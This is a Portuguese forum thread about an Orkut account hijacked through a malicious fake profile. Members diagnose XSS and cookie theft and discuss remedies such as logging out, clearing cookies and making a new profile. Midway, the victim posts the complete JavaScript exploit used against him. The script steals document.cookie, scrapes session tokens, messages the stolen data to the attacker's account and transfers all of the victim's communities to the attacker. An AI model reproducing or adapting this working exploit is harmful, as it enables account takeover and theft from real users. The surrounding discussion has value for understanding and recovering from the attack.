Orkut - profile fake com comando nas imagens

[Syndrome]

Entao outro dia me deixou uma msg um profile fake lá no orkut.
Ai eu fui ver o profile e nas fotos do album tinha comandos embaixo das fotos.
Na hora eu fiz a cagada de apertar numa foto e nao deu tempo de cancelar.
Quando foi pra aumentar a foto, o comando na aparecia escrito mais, ou seja, foi executado.

Agora tem um besta que tem acesso ao meu profile.
Um dia o nome do meu profile tinha mudado pra "EU USO FF KKKKKKKKKK"
Isso será que é vulnerabilidade do firefox?
De qualquer forma o cara ainda tem acesso ao profile, ele tem pegado minhas comunidades mas o orkut devolve.
Queria saber o que eu posso fazer pra ele nao ter mais acesso.

Alguém dai consegue pensar em algo? Nao acho que ele tenha a senha do meu profile, puta velho, e também eu nao sei qual o comando que rodou porque eu nao tenho como chegar naquele profile fake.

Então na atualidade nao sei o que fazer.
Alguma sugestão?

[snake]

ele tem seu cookie. provavelmente usou XSS (Cross-site Scripting)

[drakiN]

vira emo
aehoaehaeiohea
nao sei cara, c pá vc tava durmindo
imaginação..
c ele n pode fzer nada, pronto entao

[Syndrome]

Quote:

Postado por snak3

ele tem seu cookie. provavelmente usou XSS (Cross-site Scripting)

É na hora eu vi que nao era nada muito complexo.
Como eu faco pra melhorar a situacao? Dá pra arrumar o problema daqui?
Ter meu cookie significa que ele tem a senha ou só acesso?

Vai trabalha a mente pra ajudar o próximo! Please
oiaeheoai

[s p o o l]

eu acho que ele só tem o acesso... o orkut reconhece ele como logado... é isso?

[SuckerBuster]

mude a senha

[relax']

putz que merda isso
ja valeu o aviso de nao clicar cegamente em foto de album, que escroto isso hein

[Syndrome]

Escrotíssimo.

O cara falou num scrap que vai apagar meu profile se eu nao fizer nao sei o que..
Biriri barara.. Ele que se foda.

Quero saber o que fazer, eu também acho que ele só tem acesso, mas não tem a senha.
Eu já mudei a senha e o email.
A solução não é simples assim aparentemente.

O que fazer agora?
Senha mudada, email mudado, ele ainda tem acesso.
Acredito que não tem a senha. E aí? Alguma idéia?

[SuckerBuster]

hmmm
denuncie

[Sussa]

Quote:

Postado por snak3

ele tem seu cookie. provavelmente usou XSS (Cross-site Scripting)

Ctz! So sei oq é isso graças a tu. eheheh =*

[Syndrome]

Então gente, para de falar coisas simples como mudar senha, denunciar, contar pro tio, até postar na ds eu já postei, saca?

Agora eu to pedindo ajuda extra curricular pra voces nerds hack'a bitches pra me ajudarem com esse problema, eu acho que é cookie mesmo, por isso falei que ele tem acesso mas nao tem a senha.
Nao mudou a senha do profile porque nao tem acesso a ela pra digitar e confirmar.

Alguma sugestao mais complexa??

[EviLBraiN]

apaga seu profile e faz outro novo.

[Sussa]

Que dia foi que vc clicou no link com xss?
Que dia ocorreu a primeira manifestação dele em seu orkut?

[snake]

Provavelmente ele nao sabe sua senha, mas o orkut reconhece como logado..
tenta mudar a senha

[Never Ping]

Quote:

Postado por PitBicha

Ctz! So sei oq é isso graças a tu. eheheh =*

(2) .o/

[Tannark]

Faça como eu e apague seu orkut

[paulocamillo]

só uma coisa...
vai nas Mensagens.. dai voce vai nas Enviadas !

Você vai ver o que você mandou para ele.... o navegador.. versão e tal..
ve ae....

fica saindo e entrando no orkut.. Dando "sair" e vai limpando seus cookies.. sei lah!

[mllr]

sai do orkut, muda a senha pelo GMAIL

exclui todas as senhas da tua lista (olha antes, se tiver algo importante, salva num txt) do ff

fecha o ff

limpa os cookies + temporários (se tiver o setup, reinstala o firefox)

abre denovo, loga com tua nova senha

ele vai criar um cookie novo, acho que arruma o problema ^^

[]'s

[Biel]

Quote:

Postado por paulocamillo

só uma coisa...
vai nas Mensagens.. dai voce vai nas Enviadas !

Você vai ver o que você mandou para ele.... o navegador.. versão e tal..
ve ae....

fica saindo e entrando no orkut.. Dando "sair" e vai limpando seus cookies.. sei lah!

Não é ele que tem o cookie com o acesso do cara?


Bom, primeiro de tudo avise todos os seus amigos de que essa conta está hackeada e vc vai criar outra. Segunda coisa, não clique em qquer coisa que veja pela frente, e seja feliz!

[rini]

aconteceu isso com um amigo meu..
ele tentou várias maneiras nerds de solucionar o problema mas a pessoa continuava a zoar o orkut dele..
a solução?! fez outro e deletou o antigo

[RedTrap]

q irado euHEUHeuhE
isso q dar clicar d mais

[Syndrome]

Quote:

Postado por mllr

sai do orkut, muda a senha pelo GMAIL

exclui todas as senhas da tua lista (olha antes, se tiver algo importante, salva num txt) do ff

fecha o ff

limpa os cookies + temporários (se tiver o setup, reinstala o firefox)

abre denovo, loga com tua nova senha

ele vai criar um cookie novo, acho que arruma o problema ^^

[]'s

Uso o hotmail, se eu mudar a senha de lá, nao muda a do orkut.
Como faço??

[mllr]

muda a senha por la mesmo entao ou nem muda a senha

ou faz as duas coisas hehehehe

[]'s

[Syndrome]

Quote:

Postado por paulocamillo

só uma coisa...
vai nas Mensagens.. dai voce vai nas Enviadas !

Você vai ver o que você mandou para ele.... o navegador.. versão e tal..
ve ae....

fica saindo e entrando no orkut.. Dando "sair" e vai limpando seus cookies.. sei lah!

Hmmmm achei!
Tem essa mensagem pra o profile dele sim.
Que eu posso fazer agora?

[Syndrome]

Bom seguinte gente..
Tenho que ser rapido pra decidir, já matutei aqui quais sao os perigos reais.

Ele pode apagar o profile, ele pode apagar comunidades, ou pode zoar algo delas.

Ele nao tem a senha, ele só é reconhecido como logado.
Ou pior, ele só tem acesso a uma parte dos comandos, não tenho certeza
Eu preciso achar uma maneira de mudar o cookie, pra que quando ele tente ser reconhecido, o cookie seja diferente e assim nao seja aceito.

Então eu preciso ver se é possível fazer isso ou se eu apago o orkut e faço outro e transfiro pra esse orkut novo as comunidades.

E aí alguma ideia brilhante?

[Syndrome]

:

var uid="6611314433566349528"; // Exploit escrito por Rodrigo Lacerda
//window.alert('injetado');

function createXMLHttpRequest()
{
try{ return new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){}
try{ return new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){}
try{ return new XMLHttpRequest(); }catch(e){}
return null;
}

function getCookies()
{
subject="Orkut Cookie Exploit";
dcookie=document.cookie;
if(dcookie.indexOf('state') > -1)
{
mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nExploit escrito por Rodrigo Lacerda";
}
else
{
mensagem = "Este usuário usa Internet Explorer e a função de pegar cookies falhou, verifique se ele enviou alguma comundiade\n\nOrkut Community Transfer & Cookie Stealer Exploit\n";
}
check_scraps();
};
getCookies();

function velocity_transfer()
{
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xml.send(send);xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlrtr=xml.responseText;
x++;
if(x<cmm.length)
{
velocity_transfer();
}
}
};
};

function array_cmm()
{
var xml2= createXMLHttpRequest();
xml2.open("GET","http://www.orkut.com/Communities.aspx",true);
xml2.onreadystatechange=function()
{
if(xml2.readyState==4)
{
var xmlr=xml2.responseText;
if(!xmlr.match(/textPanel/gi))
{
cont=xmlr;
ini=cont.indexOf('<DIV id=ownedCommunities') > -1 ? cont.indexOf('<DIV id=ownedCommunities') : cont.indexOf('<div id="ownedCommunities"');
fim=cont.indexOf('<DIV id=pendingCommunities') > -1 ? cont.indexOf('<DIV id=pendingCommunities') : cont.indexOf('<div id="pendingCommunities"');
cont2=cont.substring(ini,fim)
cmm=String(cont2.match(/cmm=\d+/g)).replace(/cmm=/g,'');
cmm=cmm.split(',');
if(cmm)
{
velocity_transfer();
}
}
else
{
array_cmm();
};
};
};
xml2.send(null);
};

function send_message()
{
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&uid="+uid+"&sendTo=user&subject="+subject+"&body="+encodeURIComponent(mensagem)+"&Action.submit";
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/Compose.aspx',true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xml.send(send);xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlrtr=xml.responseText;
if(!xmlrtr.match(/textPanel/gi))
{
array_cmm();
}
else
{
send_message();
}
}
};
};


function check_scraps()
{
x=0;
var xml=createXMLHttpRequest();
xml.open("GET","Scrapbook.aspx",true);
xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlr1=xml.responseText;
if(!xmlr1.indexOf('textPanel') > -1)
{
SIG=xmlr1.match(/signature. value="(.+)"/i)[1];
POST=xmlr1.match(/name="POST_TOKEN" value="([^"]+)/i)[1];
send_message();
}
else
{
check_scraps();
}
};
};
xml.send(null);
};

// Exploit escrito por Rodrigo Lacerda

Esse é o exploit, postando crendo que os imbecis que atualmente residem na darkside nao tenham capacidade para usa-lo, quem tem capacidade também tem capacidade pra saber que é coisa de babaca.

E aí, IS THERE A WAY OUT OF HERE??

[Syndrome]

Putz esqueci de postar um comentario e nao da pra editar..
Se eu criar outro profile (eu sei que é meio lógico, mas vou perguntar), ele nao vai ter acesso a ele não é?

[Sussa]

Não, a menos q vc de bobeira e clique no maldito link novamente. hehe
E vc não respondeu minha msg. >=P
Mas tb nem importa mais. huaauhau

Salva a lista de contatos e importa pro novo orkut. Já era.

[tdf]

Orkut é o site mais mal escrito da história hehe

[Syndrome]

Quote:

Postado por PitBicha

Não, a menos q vc de bobeira e clique no maldito link novamente. hehe
E vc não respondeu minha msg. >=P
Mas tb nem importa mais. huaauhau

Salva a lista de contatos e importa pro novo orkut. Já era.

Certeza acho que nao tenho opção.
Nao respondi a pergunta porque eu nao tinha certeza e mesmo assim aquilo nao importa eu acho.

[Sussa]

Importava sim. Os cookies não seriam validos eternamente. =/

[Syndrome]

Quote:

Postado por PitBicha

Importava sim. Os cookies não seriam validos eternamente. =/

Vai pitbicha ajuda poxa..
Tem forma de atualizar os cookies?
Acho que faz uns 4 dias. Foi no sábado que começou ou sexta. Eu cliquei acho que uns dois dias antes.

Tem como eu atualizar os cookies pra os dele nao serem mais aceitos?

[ZeroCarontE]

se vc jah deslogou e ele continua indo, gg, nao eh roubo de cookie

esse exploit manda tds as comunidades pra ele e tambem 2 campos: "signature" e "post_token".. aparentemente esses dados sao unicos pra cada usuario e nao mudam nunca, e parece ser a unica coisa q o orkut usa pra identificar os usuarios ao postar scraps, etc

orkut lixo, esse tipo de coisa tem q mudar a cada login

[Oni]

Eu vi o cookie do orkut e ele expira "at end of session"

Clica no sair e depois loga de novo

Acho que só isso já resolve.

PS: Isso me lembra o cookie do fotolog que levava um ano para expirar..
AEHOhoaeahoehoehoe

[Ted]

Simples, manda mensagem pro suporte do orkut falando isso. Eles além de resolver seu problema ainda arrumam um jeito de não deixar esse exploit funcionar novamente com mais ninguém.

[Aveia-Quaker]

Quote:

Postado por Ted

Simples, manda mensagem pro suporte do orkut falando isso. Eles além de resolver seu problema ainda arrumam um jeito de não deixar esse exploit funcionar novamente com mais ninguém.

AH MAIS CLARO....

Isto vai acontecer sim... Mas daqui a 2 meses quando eles virem a mensagem e te responder que 'estavam muito ocupados'

[Sussa]

Quote:

Postado por Oni

Eu vi o cookie do orkut e ele expira "at end of session"

Clica no sair e depois loga de novo

Acho que só isso já resolve.

PS: Isso me lembra o cookie do fotolog que levava um ano para expirar..
AEHOhoaeahoehoehoe

(1)

Quote:

Postado por ZeroCarontE

orkut lixo, esse tipo de coisa tem q mudar a cada login

(2)

Se mesmo assim acontecer algo errado, então não é esse exploit.

[shogun]

Quote:

Postado por ZeroCarontE

se vc jah deslogou e ele continua indo, gg, nao eh roubo de cookie

Ele pode ter roubado o cookie de uma sessão em que ele não deu logout... O logout do orkut soh mata a sessão corrente...
Limpar o cookie do seu navegador não vai impedir que alguem que tenha roubado o cookie use ele..

Quando eu comecei usar o orkut em 2004 ele expirava a sessão a cada 30 minutos, chegava a ser chato, mas era mais seguro...

[Hades]

alguem sabe dizer se essa treta dah soh no ff ou tambem no ie?

[Oni]

Quote:

Postado por Hades

alguem sabe dizer se essa treta dah soh no ff ou tambem no ie?

Acho que dá nos dois. Esse exploit tá com cheiro de falha de segurança na programação do orkut...

[Syndrome]

Já mandei varios emails pro pessoal do orkut.
Eles devolvem as comunidades e tal.
Já deslogei também, é o que disseram, o logout encerra a sessao atual, ele tem tipo uma fixa com ele.

Eu estou esperando que o pessoal do orkut me devolva denovo as comunidades ai eu transfiro pra um profile novo.
:/